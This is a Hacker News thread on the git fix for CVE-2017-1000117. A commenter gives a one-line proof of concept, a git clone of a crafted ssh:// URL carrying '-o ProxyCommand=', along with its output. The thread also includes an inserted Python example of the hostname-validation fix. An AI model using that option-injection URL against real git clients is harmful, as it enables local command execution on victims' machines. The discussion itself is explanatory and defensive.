
Git v2.14.1, v2.13.5, and others – security fix for CVE-2017-1000117 - ge0rg
https://www.mail-archive.com/linux-kernel@vger.kernel.org/msg1466490.html
======
jjnoakes
Is there a high level write up about this somewhere? I can't figure out off
the top of my head how a hostname that starts with a hyphen and gets mistaken
for an ssh option causes arbitrary local command execution. Wouldn't the first
word of the remote git command slide over and become the hostname?

~~~
cyphar
I haven't actually tried this, but I would assume that the exploit would
involve tricking Git into passing an ssh_config(5) option (through -o or
through -F) which then has a ProxyCommand or LocalCommand that will run on the
local machine.

EDIT: Yeah, here's a sample exploit. Popping a shell is left as an exercise to
the reader.

    % git version
    git version 2.14.0
    % git clone 'ssh://-o ProxyCommand=touch/foo'
    Cloning into 'foo'...
    Pseudo-terminal will not be allocated because stdin is not a terminal.
    touch: missing file operand
    Try 'touch --help' for more information.
    ssh_exchange_identification: Connection closed by remote host
    fatal: Could not read from remote repository.

    Please make sure you have the correct access rights
    and the repository exists.

------
belovedeagle
Could this not have been fixed by prefixing the '--' argument on the command
line, and requiring that all ssh implementations must implement that in order
to be compatible?

Seriously, why are we still dealing with what amounts to a quoting issue in
2017?
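The two mitigations discussed in the thread, shown side by side as an added example that is not from the linked advisory or from git's own source: a URL parser that extracts user, host and port from an `ssh://` URL the way git must before it execs a transport program, the leading-dash rejection that git 2.14.1 and the other fixed releases apply to those three values (so `ssh://-o ProxyCommand=.../foo` never reaches ssh's option parser), and, optionally, the `--` end-of-options marker belovedeagle asks about. The function names (`split_ssh_url`, `is_dashed_argument`, `build_ssh_argv`) and the sample URLs are hypothetical and constructed for this illustration; nothing here is executed, the result is only the argv that would be passed to ssh.

```python
"""Hostname validation for ssh:// remotes, modelled on the CVE-2017-1000117 fix.

Constructed example: the helpers below are hypothetical, not git's code.
"""
import shlex


def split_ssh_url(url):
    """Split ssh://[user@]host[:port]/path into (user, host, port, path).

    Deliberately naive, like the URL handling that made the bug possible:
    whatever sits between 'ssh://' and the first '/' is taken as the
    authority, so a crafted authority such as '-o ProxyCommand=touch'
    becomes the host verbatim.
    """
    prefix = "ssh://"
    if not url.startswith(prefix):
        raise ValueError("not an ssh:// URL")
    authority, sep, path = url[len(prefix):].partition("/")
    user = None
    if "@" in authority:
        user, _, authority = authority.rpartition("@")
    port = None
    if authority.startswith("["):            # bracketed IPv6 literal
        host, _, after = authority[1:].partition("]")
        if after.startswith(":"):
            port = after[1:]
    elif authority.count(":") == 1:          # host:port
        host, _, port = authority.partition(":")
    else:
        host = authority
    return user, host, port, ("/" + path) if sep else ""


def is_dashed_argument(value):
    """True if the value would be parsed as an option by a getopt-style CLI.

    This is the shape of the check the fixed git releases apply to the
    user, host and port before they are handed to ssh (hypothetical name).
    """
    return value.startswith("-")


def build_ssh_argv(url, remote_command, use_double_dash=False):
    """Return the argv that would be handed to ssh for a git remote URL.

    Raises ValueError instead of passing an option-looking value through.
    With use_double_dash=True the '--' marker is also emitted; OpenSSH
    honours it, but git cannot assume every ssh-compatible program does,
    which is the compatibility problem raised in the thread.
    """
    user, host, port, path = split_ssh_url(url)
    for name, value in (("user", user), ("host", host), ("port", port)):
        if value is not None and is_dashed_argument(value):
            raise ValueError(f"strange {name} name '{value}' blocked")
    argv = ["ssh"]
    if port:
        argv += ["-p", port]
    if use_double_dash:
        argv.append("--")
    argv.append(f"{user}@{host}" if user else host)
    # The remote command is a single argument that the remote shell
    # re-parses, so the path is shell-quoted.
    argv.append(f"{remote_command} {shlex.quote(path)}")
    return argv


if __name__ == "__main__":
    # Constructed sample inputs: a benign remote and the shape of URL from
    # the sample session above.
    print(build_ssh_argv("ssh://git@example.com:2222/repo.git", "git-upload-pack"))
    try:
        build_ssh_argv("ssh://-o ProxyCommand=touch/foo", "git-upload-pack")
    except ValueError as err:
        print("rejected:", err)
```

The benign URL yields `['ssh', '-p', '2222', 'git@example.com', "git-upload-pack /repo.git"]`, while the crafted one is rejected before any process is spawned. Note that the check has to cover the port and user as well as the host: all three are separate argv entries that a getopt-style parser would otherwise interpret.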

~~~
cyphar
Because git is implemented as a series of scripts around some core C (or Perl)
programs. Really cool project, horrible architecture. I don't use Mercurial,
but it's kinda nice that they only use _one language_.

